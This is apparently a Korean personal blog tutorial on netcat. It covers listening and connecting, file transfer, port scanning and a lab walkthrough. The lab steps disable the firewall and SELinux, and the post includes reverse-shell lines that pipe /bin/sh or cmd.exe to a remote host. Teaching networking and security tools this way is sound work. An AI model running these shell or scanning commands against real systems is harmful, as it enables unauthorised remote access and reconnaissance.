You cannot see this page without javascript.

진주성 블로그 방문하기

보안 netcat

2018.10.09 02:50

구피천사 조회 수:1194

TCP UDP connection program server/client
Server port is opened for users to use its services.

nc -nlvp 4444 (server side)
nc -nv 10.10.10.1 4444 (client side)

​Reverse connect

​Usually when we connect to server to use services. But reverse connection is to connect to server to let them use client's pc.

nc -nlvp 4444 (server side)
nc -nv 10.10.10.1 4444 -e /bin/sh (client side)


​Transferring files

nc -nlvp 4444 > incoming.exe (server side)
nc -nv 10.10.10.1 4444 </usr/share/windows-binaries/wget.exe (client side)


ncat -lvp 4444 -e cmd.exe --ssl
nc -nv 10.10.10.1 4444


netcat : network connection 에서 raw-data read,write 할수있는 유틸리티다.


-n : 호스트네임과 포트를 숫자로만 입력받는다.
-v : verbosity 를 증가시킨다. 더 많은 정보를 얻는다. 포트스캔시 오픈유무를 얻을수 있다.
-u : UDP 모드로 통신한다.
-p : -l 옵션과 같이 사용하며 데몬모드일때 로컬 포트를 지정한다.
-l : listen 모드로 대기한다.
-z : 데이타를 보내지 않고 통신을 종료한다. 보통 스캔할때 이 옵션을 사용한다.


그외 여러 옵션이 있는데 생략하고.


데이타 입력을 표준입력으로 부터 받을수 있고 출력은 표준출력으로 보낼수 있다.
따라서 네트워크 양 피어에서 한쪽에서는 파일을 쓰고 한쪽에서 받는다면 파일 카피같은것을 네트워크로 할수 있다.


포트스캔시 -v -z 옵션을 사용하는데 그 출력은 표준에러로 출력된다.
데이타를 가공할려면 표준에러를 잡아서 하여야 할것이다.


아래는 몇가지 예시.

## port 열려있는지 체크
netcat -v -z -w 3 host port


## range 형태로 포트체크(연결시도시 무응답인경우 3초까지(-w 3) 만 기달린다.
netcat -v -z -w 3 host port1-port2


## 원격지 머신에 tcp 연결후 데이타 쓰기
netcat -n host port < data.txt


## 원격지 머신에 udp 연결후 데이타 쓰기
netcat -u -n host port < data.txt

 

 

* NC (NetCat)

 - 네트워크로 연결된 데이터를 사용하는 툴
 - nc 네트워크 입출력

! 실습

@Server-A
 (
 #setenforce 0               => 방화벽 해제
 #service iptables stop  => 방화벽 해제
 )
 
 #yum install -y nc        => nc설치
 
 #nc -l [포트번호]
 #nc -l 2000 => 포트활성화 (l : listen)
    nc프로그램이 2000번 포트를 활성화(개방)하고 대기상태


@Practice
 (
 #setenforce 0
 #service iptables stop
 )
 
 #yum install -y nc => nc설치
 
 nc [아이피주소] [포트번호]
 #nc 100.100.100.100 2000 => 100.100.100.100ip의 2000번 포트로 연결
 
 -> 데이터 입력 후 Server-A에서 확인

Practice에서 hello라고 입력시


Server-A에서 hello가 나타나는 것을 확인할 수 있습니다.
 -> Ctrl+d로 종료
 

 포트 스캔
 [사용 방법]
 #nc -z [아이피] [특정포트] => 특정 포트만 스캐닝
 #nc -z [아이피] [시작범위-종료범위] => 범위 포트 스캐닝
 
 ! 실습
 @Practice
 #nc -z 100.100.100.100 22 => ssh서비스 o
 #nc -z 100.100.100.100 23 => telnet 서비스 x
 #nc -z 100.100.100.100 80 => http 서비스 x
 
 #nc -z 100.100.100.100 20-1000 => ssh 서비스 o
 
 @Server-A
 #yum install httpd => 웹서버 설치
 #service httpd start => 웹서버 실행
 
 #nc -z 100.100.100.100 22 => ssh서비스 o
 #nc -z 100.100.100.100 23 => telnet 서비스 x
 #nc -z 100.100.100.100 80 => http 서비스 o
 
 #nc -z 100.100.100.100 20-1000 => ssh 서비스 o
                                   http 서비스 o


 

번호 제목 날짜 조회 수
155 vi, vim ^M 제거 2021.04.02 39
154 Apache Log4j 취약점및 대응방안 file 2022.02.05 42
153 qlogic qaucli command - HBA카드 온도체크 file 2022.07.05 46
152 Tibero 접속 및 관리 2023.10.25 52
151 weblogic admin 패스워드 변경 방법 2021.04.06 60
150 HPUX Apache 2.4.53 다운로드 및 설치 file 2022.07.20 62
149 개인정보 2017.11.01 75
148 hp-ux glance Memory Sort 2021.02.26 85
147 IoT 보안 2017.11.08 87
146 디지털 포렌직 조사의 일반원칙 2017.11.07 92
145 개인정보 보호법 2017.11.09 96
144 정보통신망법 2017.11.09 97
143 SSL, IPSEC 2017.11.01 99
142 전자서명법 - 공인인증서 2017.11.09 103
141 DDos 공격대응 가이드 file 2017.08.25 105
진주성 블로그 방문하기
CLOSE